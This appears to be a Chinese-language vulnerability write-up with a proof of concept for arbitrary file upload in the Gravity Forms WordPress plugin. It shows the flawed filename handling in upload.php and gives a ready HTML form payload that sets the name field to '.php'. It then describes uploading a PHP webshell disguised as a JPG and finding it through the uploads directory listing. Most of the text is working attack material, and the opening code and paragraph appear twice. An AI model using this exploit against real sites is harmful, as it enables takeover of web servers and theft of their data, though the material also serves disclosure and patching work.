<ul><li>/includes/upload.php</li></ul><pre class="">$file_name = isset($_REQUEST["name"]) ? $_REQUEST["name"] : ''; $field_id = rgpost("field_id"); $field = GFFormsModel::get_field($form, $field_id); if ( empty( $field ) ) { die(); } // Clean the fileName for security reasons $file_name = preg_replace('/[^\w\._]+/', '_', $file_name); …. $tmp_file_name = $form_unique_id . "_input_" . $field_id . "_" . $file_name; $file_path = $target_dir . $tmp_file_name; </pre><p>用户传入的name没有经过检查扩展名直接拼入文件名,可以绕过黑名单检测导致任意文件上传。</p><p>将如下Payload保存为网页文件:</p><pre class=""><form action="http://10.211.55.3/wordpress/?gf_page=upload" method="post" enctype="multipart/form-data"> <input type="file" name="file"> <input type="text" name="name" value=".php"> <input type="text" name="field_id" value="1"> <input type="text" name="form_id" value="1"> <button type="submit">Submit</button> </form> </pre><p>打开上传一个jpg文件,内容是PHP的webshell: </p><p><img...
<ul><li>/includes/upload.php</li></ul><pre class="">$file_name = isset($_REQUEST["name"]) ? $_REQUEST["name"] : ''; $field_id = rgpost("field_id"); $field = GFFormsModel::get_field($form, $field_id); if ( empty( $field ) ) { die(); } // Clean the fileName for security reasons $file_name = preg_replace('/[^\w\._]+/', '_', $file_name); …. $tmp_file_name = $form_unique_id . "_input_" . $field_id . "_" . $file_name; $file_path = $target_dir . $tmp_file_name; </pre><p>用户传入的name没有经过检查扩展名直接拼入文件名,可以绕过黑名单检测导致任意文件上传。</p><p>将如下Payload保存为网页文件:</p><pre class=""><form action="http://10.211.55.3/wordpress/?gf_page=upload" method="post" enctype="multipart/form-data"> <input type="file" name="file"> <input type="text" name="name" value=".php"> <input type="text" name="field_id" value="1"> <input type="text" name="form_id" value="1"> <button type="submit">Submit</button> </form> </pre><p>打开上传一个jpg文件,内容是PHP的webshell: </p><p><img alt="E245C178-EC11-44DA-8B89-1B9EA23762F1.png" src="https://images.seebug.org/@/uploads/1433922080883-E245C178-EC11-44DA-8B89-1B9EA23762F1.png" data-image-size="608,107"><br></p><p>上传:</p><p> <br></p><p><img alt="FD8CF9E3-F581-437A-8299-A1406BF35AA5.png" src="https://images.seebug.org/@/uploads/1433922096082-FD8CF9E3-F581-437A-8299-A1406BF35AA5.png" data-image-size="607,92"><br></p><p>访问如下网址:</p><pre class="">http://10.211.55.3/wordpress/wp-content/uploads/gravity_forms</pre><p>如果可以列出目录,即可得到shell具体地址:</p><p><img alt="CE575EA3-DED2-4718-A2C8-7B51EFF4E5A4.png" src="https://images.seebug.org/@/uploads/1433922115545-CE575EA3-DED2-4718-A2C8-7B51EFF4E5A4.png" data-image-size="588,223"><br></p>
